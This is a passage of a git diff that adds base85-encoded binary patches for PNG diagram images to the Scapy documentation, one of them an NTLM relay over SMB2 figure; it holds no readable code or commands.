z`NP|jI?jPU97dwvM|a~*fZe{H>Ve~|xB(gQWi%B}Iw`jxR}G zayZP6rFFLVyep;YcLZqEEwGWS05%E4&%NDqgGrHNIN^I}B{r>cgGaNn$Cdx^Sxt;V~icO(c?%2%7gn}Qv=#4~)VP4AB2K2?;yENTsAa^0*Ki{d1+uM0{i>rAN)uE0>vhCTH7Mp(3% zNB6M20SFp_?}ZFo$y_^{!n(xOrnbuS^8 zcxj3xEe$ces?BzUJlZ2Rv7iMhj6gFyWk{oO81GQyoI(q5*>shy|ElqU!r$XI8 zJH{M)ZO?>q?FyW4mBdTjC6V%y5cBjl;D)%hrS`L#YQc*xpVL$hqAX0Z2NP*gbw!pT z!XJXTCICQuWHm40(&>5{M`$5!wq^ck!G*5r(?=4{{ur?zwu~UAwBH6<1Fvy%cdfO( zHhlHKrpdZ5Fky#*#dKorO3%e^460BagQ7k*q!x&k+PmHIi3!hMMZ4Qh8!4R>aw_ zcTIG5e#}kRei8^BBIJ(@+e}t-FcCY?*3y;O>OUcnQ#q@xBz*1c(JDXs&3lIayI-?$mr3tQw{FC|KlYvr zz#7DG3Gv%4q}k9GOub_1NSbXW2V*3VUF7s!{Wbr{ou-?+UQu%vs9$~9M)uSVKG(7h z%N*ThmE|`H0tyo(E|);BxQo^0Cg)O8f%{ix<)tQ#MUz-A?cS)VFRVzFIz>*B|BXi_ z0^fxD%1zl_H;*(JV0vIYVC0hIv8BDUuL^HoVBq0$FaHch@taBQ6P{_eL{*tK5f zY1=|i%zGqLC;1X0`GH4UeU~oH!Oa6)*{wE;!P1Po_;b`YGGUwyhe>%}1-^qn8_tiX zZ)@|dQ9S<$-K;c2uhUF2Q<6Sqfo`H0id(0X4h>3f_WisM^J)Tg&h2w3hFh;9?z4SJ z#rTFzBi4&)4o$DC$h4>+Ca3H(U-DwCd@)O~j0#`(H}lPB>W$MQ?Q`fBI^EHn^YQ^w zk=FiO9!Xg0B0l6p&r|xdb9Qc2-2Z>3hQ{-+OpPOZEiw>lVZ5VRAH4mXpQz2ejpc|A zH5D1_v^2r=8}}(DYMy2ZLEilKgfo{_#87tB$rl*SMCgJ7{F7L~Jj1m}8m>>E2%6;k zxn0SM45FqYAVonL&YTjfwX6F|YHxvNLObD)n_ zwsKEeFFj^2gl4dMHp>#@`!1 zT~N-x-97*kEs3G)a9!qgdDoa<e(RwSbmHbd@mnHH9+R^X$aN)&xk7ySUh7ovO`Xf0O%O$oE+kBvz8$33op7YL~@I zin5qbiO$x^Oc5UX`%Fw<{QKhvXQV%FID=wCXA~Q@A+za%(<(>McKmFGl7hAN%^1 zFO=hTpv-dB!L0)E>81J8N&7J)zwj^oM1q1IY0exa0Qo-~8Dl)Cj*qVPZLM;UeemA^ Dcr^|O literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/ntlm/ntlmrelay_smb2.png b/doc/scapy/graphics/ntlm/ntlmrelay_smb2.png new file mode 100644 index 0000000000000000000000000000000000000000..f9931227fd236cab82f6cb535f912f447bb5ea2c GIT binary patch literal 240337 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 